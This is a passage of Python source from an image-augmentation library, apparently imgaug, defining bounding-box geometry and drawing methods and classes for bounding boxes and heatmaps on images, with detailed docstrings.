y1_i = max(self.y1, other.y1)
x2_i = min(self.x2, other.x2)
y2_i = min(self.y2, other.y2)
if x1_i >= x2_i or y1_i >= y2_i:
return default
else:
return BoundingBox(x1=x1_i, y1=y1_i, x2=x2_i, y2=y2_i)
def union(self, other):
"""
Compute the union bounding box of this bounding box and another one.
This is equivalent to drawing a bounding box around all corner points of both
bounding boxes.
Parameters
----------
other : BoundingBox
Other bounding box with which to generate the union.
Returns
-------
result : BoundingBox
Union bounding box of the two bounding boxes.
"""
return BoundingBox(
x1=min(self.x1, other.x1),
y1=min(self.y1, other.y1),
x2=max(self.x2, other.x2),
y2=max(self.y2, other.y2),
)
def iou(self, other):
"""
Compute the IoU of this bounding box with another one.
IoU is the intersection over union, defined as:
area(intersection(A, B)) / area(union(A, B))
= area(intersection(A, B)) / (area(A) + area(B) - area(intersection(A, B)))
Parameters
----------
other : BoundingBox
Other bounding box with which to compare.
Returns
-------
result : float
IoU between the two bounding boxes.
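Examples
--------
A sketch with two partially overlapping boxes (coordinates are illustrative):
>>> bb1 = BoundingBox(x1=0, y1=0, x2=10, y2=10)
>>> bb2 = BoundingBox(x1=5, y1=5, x2=15, y2=15)
>>> iou = bb1.iou(bb2)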
"""
inters = self.intersection(other)
if inters is None:
return 0
else:
return inters.area / (self.area + other.area - inters.area)
def is_fully_within_image(self, image):
"""
Estimate whether the bounding box is fully inside the image area.
Parameters
----------
image : (H,W,...) ndarray or tuple of at least two ints
Image dimensions to use. If an ndarray, its shape will be used. If a tuple, it is
assumed to represent the image shape.
Returns
-------
result : bool
True if the bounding box is fully inside the image area.
False otherwise.
"""
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
return self.x1 >= 0 and self.x2 <= width and self.y1 >= 0 and self.y2 <= height
def is_partly_within_image(self, image):
"""
Estimate whether the bounding box is at least partially inside the image area.
Parameters
----------
image : (H,W,...) ndarray or tuple of at least two ints
Image dimensions to use. If an ndarray, its shape will be used. If a tuple, it is
assumed to represent the image shape.
Returns
-------
result : bool
True if the bounding box is at least partially inside the image area.
False otherwise.
"""
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
img_bb = BoundingBox(x1=0, x2=width, y1=0, y2=height)
return self.intersection(img_bb) is not None
def is_out_of_image(self, image, fully=True, partly=False):
"""
Estimate whether the bounding box is partially or fully outside of the image area.
Parameters
----------
image : (H,W,...) ndarray or tuple of ints
Image dimensions to use. If an ndarray, its shape will be used. If a tuple, it is
assumed to represent the image shape and must contain at least two integers.
fully : bool, optional(default=True)
Whether to return True if the bounding box is fully outside of the image area.
partly : bool, optional(default=False)
Whether to return True if the bounding box is at least partially outside of the
image area.
Returns
-------
result : bool
True if the bounding box is partially/fully outside of the image area, depending
on defined parameters. False otherwise.
"""
if self.is_fully_within_image(image):
return False
elif self.is_partly_within_image(image):
return partly
else:
return fully
def cut_out_of_image(self, image):
"""
Cut off all parts of the bounding box that are outside of the image.
Parameters
----------
image : (H,W,...) ndarray or tuple of at least two ints
Image dimensions to use for the clipping of the bounding box. If an ndarray, its
shape will be used. If a tuple, it is assumed to represent the image shape.
Returns
-------
result : BoundingBox
Bounding box, clipped to fall within the image dimensions.
"""
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
do_assert(height > 0)
do_assert(width > 0)
x1 = np.clip(self.x1, 0, width)
x2 = np.clip(self.x2, 0, width)
y1 = np.clip(self.y1, 0, height)
y2 = np.clip(self.y2, 0, height)
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2,
label=self.label
)
def shift(self, top=None, right=None, bottom=None, left=None):
"""
Shift the bounding box from one or more image sides, i.e. move it on the x/y-axis.
Parameters
----------
top : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the top.
right : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the right.
bottom : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the bottom.
left : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the left.
Returns
-------
result : BoundingBox
Shifted bounding box.
"""
top = top if top is not None else 0
right = right if right is not None else 0
bottom = bottom if bottom is not None else 0
left = left if left is not None else 0
return self.copy(
x1=self.x1+left-right,
x2=self.x2+left-right,
y1=self.y1+top-bottom,
y2=self.y2+top-bottom
)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw the bounding box on an image.
Parameters
----------
image : (H,W,C) ndarray(uint8)
The image onto which to draw the bounding box.
color : iterable of int, optional(default=[0,255,0])
The color to use, corresponding to the channel layout of the image. Usually RGB.
alpha : float, optional(default=1.0)
The transparency of the drawn bounding box, where 1.0 denotes no transparency and
0.0 is invisible.
thickness : int, optional(default=1)
The thickness of the bounding box in pixels. If the value is larger than 1, then
additional pixels will be added around the bounding box (i.e. extension towards the
outside).
copy : bool, optional(default=True)
Whether to copy the input image or change it in-place.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an error if the bounding box is partially/fully outside of the
image. If set to False, no error will be raised and only the parts inside the image
will be drawn.
Returns
-------
result : (H,W,C) ndarray(uint8)
Image with bounding box drawn on it.
"""
if raise_if_out_of_image and self.is_out_of_image(image):
raise Exception("Cannot draw bounding box x1=%.8f, y1=%.8f, x2=%.8f, y2=%.8f on image with shape %s." % (self.x1, self.y1, self.x2, self.y2, image.shape))
result = np.copy(image) if copy else image
if isinstance(color, (tuple, list)):
color = np.uint8(color)
for i in range(thickness):
y = [self.y1_int-i, self.y1_int-i, self.y2_int+i, self.y2_int+i]
x = [self.x1_int-i, self.x2_int+i, self.x2_int+i, self.x1_int-i]
rr, cc = skimage.draw.polygon_perimeter(y, x, shape=result.shape)
if alpha >= 0.99:
result[rr, cc, :] = color
else:
if is_float_array(result):
result[rr, cc, :] = (1 - alpha) * result[rr, cc, :] + alpha * color
result = np.clip(result, 0, 255)
else:
input_dtype = result.dtype
result = result.astype(np.float32)
result[rr, cc, :] = (1 - alpha) * result[rr, cc, :] + alpha * color
result = np.clip(result, 0, 255).astype(input_dtype)
return result
def extract_from_image(self, image):
"""
Extract the image pixels within the bounding box.
This function will zero-pad the image if the bounding box is partially/fully outside of
the image.
Parameters
----------
image : (H,W) or (H,W,C) ndarray
The image from which to extract the pixels within the bounding box.
Returns
-------
result : (H',W') or (H',W',C) ndarray
Pixels within the bounding box. Zero-padded if the bounding box is partially/fully
outside of the image.
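Examples
--------
A sketch of extracting pixels for a box that sticks out of the left image
border, which triggers zero-padding (sizes are illustrative):
>>> import numpy as np
>>> image = np.zeros((100, 100, 3), dtype=np.uint8)
>>> bb = BoundingBox(x1=-10, y1=20, x2=30, y2=60)
>>> crop = bb.extract_from_image(image)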
"""
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
height, width = image.shape[0], image.shape[1]
x1, x2, y1, y2 = self.x1_int, self.x2_int, self.y1_int, self.y2_int
# if the bb is outside of the image area, the following pads the image
# first with black pixels until the bb is inside the image
# and only then extracts the image area
# TODO probably more efficient to initialize an array of zeros
# and copy only the portions of the bb into that array that are
# natively inside the image area
if x1 < 0:
pad_left = abs(x1)
x2 = x2 + abs(x1)
x1 = 0
if y1 < 0:
pad_top = abs(y1)
y2 = y2 + abs(y1)
y1 = 0
if x2 >= width:
pad_right = x2 - (width - 1)
if y2 >= height:
pad_bottom = y2 - (height - 1)
if any([val > 0 for val in [pad_top, pad_right, pad_bottom, pad_left]]):
if len(image.shape) == 2:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right)), mode="constant")
else:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode="constant")
return image[y1:y2, x1:x2]
# TODO also add to_heatmap
# TODO add this to BoundingBoxesOnImage
def to_keypoints(self):
"""
Convert the corners of the bounding box to keypoints (clockwise, starting at top left).
Returns
-------
result : list of Keypoint
Corners of the bounding box as keypoints.
"""
return [
Keypoint(x=self.x1, y=self.y1),
Keypoint(x=self.x2, y=self.y1),
Keypoint(x=self.x2, y=self.y2),
Keypoint(x=self.x1, y=self.y2)
]
def copy(self, x1=None, y1=None, x2=None, y2=None, label=None):
"""
Create a shallow copy of the BoundingBox object.
Parameters
----------
x1 : None or number
If not None, then the x1 coordinate of the copied object will be set to this value.
y1 : None or number
If not None, then the y1 coordinate of the copied object will be set to this value.
x2 : None or number
If not None, then the x2 coordinate of the copied object will be set to this value.
y2 : None or number
If not None, then the y2 coordinate of the copied object will be set to this value.
label : None or string
If not None, then the label of the copied object will be set to this value.
Returns
-------
result : BoundingBox
Shallow copy.
"""
return BoundingBox(
x1=self.x1 if x1 is None else x1,
x2=self.x2 if x2 is None else x2,
y1=self.y1 if y1 is None else y1,
y2=self.y2 if y2 is None else y2,
label=self.label if label is None else label
)
def deepcopy(self, x1=None, y1=None, x2=None, y2=None, label=None):
"""
Create a deep copy of the BoundingBox object.
Returns
-------
out : BoundingBox
Deep copy.
"""
return self.copy(x1=x1, y1=y1, x2=x2, y2=y2, label=label)
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBox(x1=%.4f, y1=%.4f, x2=%.4f, y2=%.4f, label=%s)" % (self.x1, self.y1, self.x2, self.y2, self.label)
class BoundingBoxesOnImage(object):
"""
Object that represents all bounding boxes on a single image.
Parameters
----------
bounding_boxes : list of BoundingBox
List of bounding boxes on the image.
shape : tuple of int
The shape of the image on which the bounding boxes are placed.
Examples
--------
>>> bbs = [
>>> BoundingBox(x1=10, y1=20, x2=20, y2=30),
>>> BoundingBox(x1=25, y1=50, x2=30, y2=70)
>>> ]
>>> bbs_oi = BoundingBoxesOnImage(bbs, shape=image.shape)
"""
def __init__(self, bounding_boxes, shape):
self.bounding_boxes = bounding_boxes
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
"""
Get the height of the image on which the bounding boxes fall.
Returns
-------
result : int
Image height.
"""
return self.shape[0]
@property
def width(self):
"""
Get the width of the image on which the bounding boxes fall.
Returns
-------
result : int
Image width.
"""
return self.shape[1]
@property
def empty(self):
"""
Returns whether this object contains zero bounding boxes.
Returns
-------
result : bool
True if this object contains zero bounding boxes.
"""
return len(self.bounding_boxes) == 0
def on(self, image):
"""
Project bounding boxes from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the bounding boxes are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
bounding_boxes : BoundingBoxesOnImage
Object containing all projected bounding boxes.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
bounding_boxes = [bb.project(self.shape, shape) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bounding_boxes, shape)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False):
"""
Draw all bounding boxes onto a given image.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the bounding boxes.
This image should usually have the same shape as
set in BoundingBoxesOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all bounding boxes. If a single int `C`, then that is
equivalent to (C,C,C).
alpha : float, optional(default=1.0)
Alpha/transparency of the bounding boxes.
thickness : int, optional(default=1)
Thickness in pixels.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any bounding box is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn bounding boxes.
"""
for bb in self.bounding_boxes:
image = bb.draw_on_image(
image,
color=color,
alpha=alpha,
thickness=thickness,
copy=copy,
raise_if_out_of_image=raise_if_out_of_image
)
return image
def remove_out_of_image(self, fully=True, partly=False):
"""
Remove all bounding boxes that are fully or partially outside of the image.
Parameters
----------
fully : bool, optional(default=True)
Whether to remove bounding boxes that are fully outside of the image.
partly : bool, optional(default=False)
Whether to remove bounding boxes that are partially outside of the image.
Returns
-------
result : BoundingBoxesOnImage
Reduced set of bounding boxes, with those that were fully/partially outside of
the image removed.
"""
bbs_clean = [bb for bb in self.bounding_boxes if not bb.is_out_of_image(self.shape, fully=fully, partly=partly)]
return BoundingBoxesOnImage(bbs_clean, shape=self.shape)
def cut_out_of_image(self):
"""
Cut off all parts from all bounding boxes that are outside of the image.
Returns
-------
result : BoundingBoxesOnImage
Bounding boxes, clipped to fall within the image dimensions.
"""
bbs_cut = [bb.cut_out_of_image(self.shape) for bb in self.bounding_boxes if bb.is_partly_within_image(self.shape)]
return BoundingBoxesOnImage(bbs_cut, shape=self.shape)
def shift(self, top=None, right=None, bottom=None, left=None):
"""
Shift all bounding boxes from one or more image sides, i.e. move them on the x/y-axis.
Parameters
----------
top : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the top.
right : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the right.
bottom : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the bottom.
left : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the left.
Returns
-------
result : BoundingBoxesOnImage
Shifted bounding boxes.
"""
bbs_new = [bb.shift(top=top, right=right, bottom=bottom, left=left) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs_new, shape=self.shape)
def copy(self):
"""
Create a shallow copy of the BoundingBoxesOnImage object.
Returns
-------
out : BoundingBoxesOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the BoundingBoxesOnImage object.
Returns
-------
out : BoundingBoxesOnImage
Deep copy.
"""
# Manual copy is far faster than deepcopy for KeypointsOnImage,
# so use manual copy here too
bbs = [bb.deepcopy() for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBoxesOnImage(%s, shape=%s)" % (str(self.bounding_boxes), self.shape)
class HeatmapsOnImage(object):
"""
Object representing heatmaps on images.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray(float32)
Array representing the heatmap(s). If multiple heatmaps, then C is expected to denote
their number.
shape : tuple of ints
Shape of the image on which the heatmap(s) is/are placed. NOT the shape of the
heatmap(s) array, unless it is identical to the image shape (note the likely
difference between the arrays in the number of channels).
If there is not a corresponding image, use the shape of the heatmaps array.
min_value : float, optional(default=0.0)
Minimum value for the heatmaps that `arr` represents. This will usually
be 0.0.
max_value : float, optional(default=1.0)
Maximum value for the heatmaps that `arr` represents. This will usually
be 1.0.
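Examples
--------
A minimal construction sketch with a single heatmap in the default value
range (array size is illustrative):
>>> import numpy as np
>>> arr = np.zeros((64, 64), dtype=np.float32)
>>> arr[20:30, 10:40] = 1.0
>>> heatmaps = HeatmapsOnImage(arr, shape=(64, 64, 3))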
"""
def __init__(self, arr, shape, min_value=0.0, max_value=1.0):
"""Construct a new HeatmapsOnImage object."""
assert arr.dtype.type in [np.float32]
assert arr.ndim in [2, 3]
assert len(shape) in [2, 3]
assert min_value < max_value
assert np.min(arr.flat[0:50]) >= min_value - np.finfo(arr.dtype).eps
assert np.max(arr.flat[0:50]) <= max_value + np.finfo(arr.dtype).eps
if arr.ndim == 2:
arr = arr[..., np.newaxis]
self.arr_was_2d = True
else:
self.arr_was_2d = False
eps = np.finfo(np.float32).eps
min_is_zero = 0.0 - eps < min_value < 0.0 + eps
max_is_one = 1.0 - eps < max_value < 1.0 + eps
if min_is_zero and max_is_one:
self.arr_0to1 = arr
else:
self.arr_0to1 = (arr - min_value) / (max_value - min_value)
self.shape = shape
self.min_value = min_value
self.max_value = max_value
def get_arr(self):
"""
Get the heatmap array in the desired value range.
The HeatmapsOnImage object saves heatmaps internally in the value range (min=0.0, max=1.0).
This function converts the internal representation to (min=min_value, max=max_value),
where min_value and max_value are provided upon instantiation of the object.
Returns
-------
result : (H,W) or (H,W,C) ndarray(float32)
Heatmap array.
"""
if self.arr_was_2d and self.arr_0to1.shape[2] == 1:
arr = self.arr_0to1[:, :, 0]
else:
arr = self.arr_0to1
eps = np.finfo(np.float32).eps
min_is_zero = 0.0 - eps < self.min_value < 0.0 + eps
max_is_one = 1.0 - eps < self.max_value < 1.0 + eps
if min_is_zero and max_is_one:
return np.copy(arr)
else:
diff = self.max_value - self.min_value
return self.min_value + diff * arr
# TODO
#def find_global_maxima(self):
# raise NotImplementedError()
def draw(self, size=None, cmap="jet"):
"""
Render the heatmaps as RGB images.
Parameters
----------
size : None or float or iterable of two ints or iterable of two floats, optional(default=None)
Size of the rendered RGB image as (height, width).
See `imresize_single_image()` for details.
If set to None, no resizing is performed and the size of the heatmaps array is used.
cmap : string or None, optional(default="jet")
Color map of matplotlib to use in order to convert the heatmaps into RGB images.
If set to None, no color map will be used and the heatmaps will be converted
as simple intensity maps.
Returns
-------
heatmaps_drawn : list of (H,W,3) ndarray(uint8)
Rendered heatmaps, one per heatmap array channel.
"""
heatmaps_uint8 = self.to_uint8()
heatmaps_drawn = []
for c in sm.xrange(heatmaps_uint8.shape[2]):
# c:c+1 here, because the additional axis is needed by imresize_single_image
heatmap_c = heatmaps_uint8[..., c:c+1]
if size is not None:
heatmap_c_rs = imresize_single_image(heatmap_c, size,
interpolation="nearest")
else:
heatmap_c_rs = heatmap_c
heatmap_c_rs = np.squeeze(heatmap_c_rs).astype(np.float32) / 255.0
if cmap is not None:
import matplotlib.pyplot as plt
cmap_func = plt.get_cmap(cmap)
heatmap_cmapped = cmap_func(heatmap_c_rs)
heatmap_cmapped = np.delete(heatmap_cmapped, 3, 2)
else:
heatmap_cmapped = np.tile(heatmap_c_rs[..., np.newaxis], (1, 1, 3))
heatmap_cmapped = np.clip(heatmap_cmapped * 255, 0, 255).astype(np.uint8)
heatmaps_drawn.append(heatmap_cmapped)
return heatmaps_drawn
def draw_on_image(self, image, alpha=0.75, cmap="jet", resize="heatmaps"):
"""
Draw the heatmaps as overlays over an image.
Parameters
----------
image : (H,W,3) ndarray(uint8)
Image onto which to draw the heatmaps.
alpha : float, optional(default=0.75)
Alpha/opacity value to use for the mixing of image and heatmaps.
Higher values mean that the heatmaps will be more visible and the image less visible.
cmap : string or None, optional(default="jet")
Color map to use. See `HeatmapsOnImage.draw()` for details.
resize : "heatmaps" or "image", optional(default="heatmaps")
In case of size differences between the image and heatmaps, either the image or
the heatmaps can be resized. This parameter controls which of the two will be resized
to the other's size.
Returns
-------
mix : list of (H,W,3) ndarray(uint8)
Rendered overlays, one per heatmap array channel.
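Examples
--------
A sketch of overlaying a heatmap on an RGB image; one overlay is returned
per heatmap channel (sizes are illustrative):
>>> import numpy as np
>>> image = np.zeros((64, 64, 3), dtype=np.uint8)
>>> heatmaps = HeatmapsOnImage(np.zeros((32, 32), dtype=np.float32), shape=image.shape)
>>> overlays = heatmaps.draw_on_image(image, alpha=0.5, resize="heatmaps")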
"""
# assert RGB image
assert image.ndim == 3
assert image.shape[2] == 3
assert image.dtype.type == np.uint8
assert 0 - 1e-8 <= alpha <= 1.0 + 1e-8
assert resize in ["heatmaps", "image"]
if resize == "image":
image = imresize_single_image(image, self.arr_0to1.shape[0:2], interpolation="cubic")
heatmaps_drawn = self.draw(
size=image.shape[0:2] if resize == "heatmaps" else None,
cmap=cmap
)
mix = [
np.clip((1-alpha) * image + alpha * heatmap_i, 0, 255).astype(np.uint8)
for heatmap_i
in heatmaps_drawn
]
return mix
def pad(self, top=0, right=0, bottom=0, left=0, mode="constant", cval=0.0):
"""
Pad the heatmaps on their top/right/bottom/left side.
Parameters
----------
top : int, optional(default=0)
Amount of pixels to add at the top side of the heatmaps. Must be 0 or greater.
right : int, optional(default=0)
Amount of pixels to add at the right side of the heatmaps. Must be 0 or greater.
bottom : int, optional(default=0)
Amount of pixels to add at the bottom side of the heatmaps. Must be 0 or greater.
left : int, optional(default=0)
Amount of pixels to add at the left side of the heatmaps. Must be 0 or greater.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
Returns
-------
result : HeatmapsOnImage
Padded heatmaps of height H'=H+top+bottom and width W'=W+left+right.
"""
arr_0to1_padded = pad(self.arr_0to1, top=top, right=right, bottom=bottom, left=left, mode=mode, cval=cval)
return HeatmapsOnImage.from_0to1(arr_0to1_padded, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def pad_to_aspect_ratio(self, aspect_ratio, mode="constant", cval=0.0, return_pad_amounts=False):
"""
Pad the heatmaps on their sides so that they match a target aspect ratio.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
return_pad_amounts : bool, optional(default=False)
If False, then only the padded image will be returned. If True, a tuple with two
entries will be returned, where the first entry is the padded image and the second
entry are the amounts by which each image side was padded. These amounts are again a
tuple of the form (top, right, bottom, left), with each value being an integer.
Returns
-------
result : tuple
First tuple entry: Padded heatmaps as HeatmapsOnImage object.
Second tuple entry: Amounts by which the heatmaps were padded on each side, given
as a tuple (top, right, bottom, left).
If return_pad_amounts is False, then only the heatmaps object is returned.
"""
arr_0to1_padded, pad_amounts = pad_to_aspect_ratio(self.arr_0to1, aspect_ratio=aspect_ratio, mode=mode, cval=cval, return_pad_amounts=True)
heatmaps = HeatmapsOnImage.from_0to1(arr_0to1_padded, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
if return_pad_amounts:
return heatmaps, pad_amounts
else:
return heatmaps
def avg_pool(self, block_size):
"""
Rescale the heatmap(s) array using average pooling of a given block/kernel size.
Parameters
----------
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool, aka kernel size. See `imgaug.pool()` for details.
Returns
-------
result : HeatmapsOnImage
Heatmaps after average pooling.
"""
arr_0to1_reduced = avg_pool(self.arr_0to1, block_size, cval=0.0)
return HeatmapsOnImage.from_0to1(arr_0to1_reduced, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def max_pool(self, block_size):
"""
Rescale the heatmap(s) array using max-pooling of a given block/kernel size.
Parameters
----------
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool, aka kernel size. See `imgaug.pool()` for details.
Returns
-------
result : HeatmapsOnImage
Heatmaps after max-pooling.
"""
arr_0to1_reduced = max_pool(self.arr_0to1, block_size)
return HeatmapsOnImage.from_0to1(arr_0to1_reduced, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def scale(self, sizes, interpolation="cubic"):
"""
Rescale the heatmap(s) array to the provided size given the provided interpolation.
Parameters
----------
sizes : float or iterable of two ints or iterable of two floats
New size of the array in (height, width). See `imresize_single_image()` for details.
interpolation : None or string or int, optional(default="cubic")
The interpolation to use during resize. See `imresize_single_image()` for details.
Returns
-------
result : HeatmapsOnImage
Rescaled heatmaps object.
"""
arr_0to1_rescaled = imresize_single_image(self.arr_0to1, sizes, interpolation=interpolation)
# cubic interpolation can lead to values outside of [0.0, 1.0],
# see https://github.com/opencv/opencv/issues/7195
# TODO area interpolation too?
arr_0to1_rescaled = np.clip(arr_0to1_rescaled, 0.0, 1.0)
return HeatmapsOnImage.from_0to1(arr_0to1_rescaled, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def to_uint8(self):
"""
Convert this heatmaps object to a 0-to-255 array.
Returns
-------
arr_uint8 : (H,W,C) ndarray(uint8)
Heatmap as a 0-to-255 array.
"""
# TODO this always returns (H,W,C), even if input ndarray was originally (H,W)
# does it make sense here to also return (H,W) if self.arr_was_2d?
arr_0to255 = np.clip(np.round(self.arr_0to1 * 255), 0, 255)
arr_uint8 = arr_0to255.astype(np.uint8)
return arr_uint8
@staticmethod
def from_uint8(arr_uint8, shape, min_value=0.0, max_value=1.0):
"""
Create a heatmaps object from a heatmap array containing values ranging from 0 to 255.
Parameters
----------
arr_uint8 : (H,W) or (H,W,C) ndarray(uint8)
Heatmap(s) array, where H=height, W=width, C=heatmap channels.
shape : tuple of ints
Shape of the image on which the heatmap(s) is/are placed. NOT the shape of the
heatmap(s) array, unless it is identical to the image shape (note the likely
difference between the arrays in the number of channels).
If there is not a corresponding image, use the shape of the heatmaps array.
min_value : float, optional(default=0.0)
Minimum value for the heatmaps that the 0-to-255 array represents. This will usually
be 0.0. It is used when calling `HeatmapsOnImage.get_arr()`, which converts the
underlying (0, 255) array to value range (min_value, max_value).
max_value : float, optional(default=1.0)
Maximum value for the heatmaps that 0-to-255 array represents.
See parameter min_value for details.
Returns
-------
heatmaps : HeatmapsOnImage
Heatmaps object.
"""
arr_0to1 = arr_uint8.astype(np.float32) / 255.0
return HeatmapsOnImage.from_0to1(arr_0to1, shape, min_value=min_value, max_value=max_value)
@staticmethod
def from_0to1(arr_0to1, shape, min_value=0.0, max_value=1.0):
"""
Create a heatmaps object from a heatmap array containing values ranging from 0.0 to 1.0.
Parameters
----------
arr_0to1 : (H,W) or (H,W,C) ndarray(float32)
Heatmap(s) array, where H=height, W=width, C=heatmap channels.
shape : tuple of ints
Shape of the image on which the heatmap(s) is/are placed. NOT the shape of the
heatmap(s) array, unless it is identical to the image shape (note the likely
difference between the arrays in the number of channels).
If there is not a corresponding image, use the shape of the heatmaps array.
min_value : float, optional(default=0.0)
Minimum value for the heatmaps that the 0-to-1 array represents. This will usually
be 0.0. It is used when calling `HeatmapsOnImage.get_arr()`, which converts the
underlying (0.0, 1.0) array to value range (min_value, max_value).
E.g. if you started with heatmaps in the range (-1.0, 1.0) and projected these
to (0.0, 1.0), you should call this function with min_value=-1.0, max_value=1.0
so that `get_arr()` returns heatmap arrays having value range (-1.0, 1.0).
max_value : float, optional(default=1.0)
Maximum value for the heatmaps that the 0-to-1 array represents.
See parameter min_value for details.
Returns
-------
heatmaps : HeatmapsOnImage
Heatmaps object.
"""
heatmaps = HeatmapsOnImage(arr_0to1, shape, min_value=0.0, max_value=1.0)
heatmaps.min_value = min_value
heatmaps.max_value = max_value
return heatmaps
@staticmethod
def change_normalization(arr, source, target):
"""
Change the value range of a heatmap from one min-max to another min-max.
E.g. the value range may be changed from min=0.0, max=1.0 to min=-1.0, max=1.0.
Parameters
----------
arr : ndarray
Heatmap array to modify.
source : tuple of two floats
Current value range of the input array, given as (min, max), where both are float
values.
target : tuple of two floats
Desired output value range of the array, given as (min, max), where both are float
values.
Returns
-------
arr_target : ndarray
Input array, with value range projected to the desired target value range.
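Examples
--------
A sketch of projecting an array from value range (0.0, 1.0) to (-1.0, 1.0):
>>> import numpy as np
>>> arr = np.float32([0.0, 0.5, 1.0])
>>> arr_proj = HeatmapsOnImage.change_normalization(arr, source=(0.0, 1.0), target=(-1.0, 1.0))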
"""
assert is_np_array(arr)
if isinstance(source, HeatmapsOnImage):
source = (source.min_value, source.max_value)
else:
assert isinstance(source, tuple)
assert len(source) == 2
assert source[0] < source[1]
if isinstance(target, HeatmapsOnImage):
target = (target.min_value, target.max_value)
else:
assert isinstance(target, tuple)
assert len(target) == 2
assert target[0] < target[1]
# Check if source and target are the same (with a tiny bit of tolerance)
# if so, skip the computation and just copy the array instead.
# This is reasonable, as source and target will often both be (0.0, 1.0).
eps = np.finfo(arr.dtype).eps
mins_same = source[0] - 10*eps < target[0] < source[0] + 10*eps
maxs_same = source[1] - 10*eps < target[1] < source[1] + 10*eps
if mins_same and maxs_same:
return np.copy(arr)
min_source, max_source = source
min_target, max_target = target
diff_source = max_source - min_source
diff_target = max_target - min_target
arr_0to1 = (arr - min_source) / diff_source
arr_target = min_target + arr_0to1 * diff_target
return arr_target
def copy(self):
"""
Create a shallow copy of the Heatmaps object.
Returns
-------
out : HeatmapsOnImage
Shallow copy.
"""
return self.deepcopy()
def deepcopy(self):
"""
Create a deep copy of the Heatmaps object.
Returns
-------
out : HeatmapsOnImage
Deep copy.
"""
return HeatmapsOnImage(self.get_arr(), shape=self.shape, min_value=self.min_value, max_value=self.max_value)
class SegmentationMapOnImage(object):
"""
Object representing a segmentation map associated with an image.
Attributes
----------
DEFAULT_SEGMENT_COLORS : list of tuple of int
Standard RGB colors to use during drawing, ordered by class index.
Parameters
----------
arr : (H,W) ndarray or (H,W,1) ndarray or (H,W,C) ndarray
Array representing the segmentation map. May have datatypes bool, integer or float.
* If bool: Assumed to be of shape (H,W), (H,W,1) or (H,W,C). If (H,W) or (H,W,1) it
is assumed to be for the case of having a single class (where any False denotes
background). Otherwise there are assumed to be C channels, one for each class,
with each of them containing a mask for that class. The masks may overlap.
* If integer: Assumed to be of shape (H,W) or (H,W,1). Each pixel is assumed to
contain an integer denoting the class index. Classes are assumed to be
non-overlapping. The number of classes cannot be guessed from this input, hence
nb_classes must be set.
* If float: Assumed to be of shape (H,W), (H,W,1) or (H,W,C) with meanings being
similar to the case of `bool`. Values are expected to fall always in the range
0.0 to 1.0 and are usually expected to be either 0.0 or 1.0 upon instantiation
of a new segmentation map. Classes may overlap.
shape : iterable of int
Shape of the corresponding image (NOT the segmentation map array). This is expected
to be (H, W) or (H, W, C) with C usually being 3. If there is no corresponding image,
then use the segmentation map's shape instead.
nb_classes : int or None
Total number of unique classes that may appear in a segmentation map, i.e. the max
class index. This may be None if the input array is of type bool or float. The number
of classes, however, must be provided if the input array is of type int, as then the
number of classes cannot be guessed.
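Examples
--------
A construction sketch using an integer class-index map; nb_classes is
required for integer input (array content is illustrative):
>>> import numpy as np
>>> arr = np.zeros((64, 64), dtype=np.int32)
>>> arr[20:40, 20:40] = 1
>>> segmap = SegmentationMapOnImage(arr, shape=(64, 64, 3), nb_classes=2)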
"""
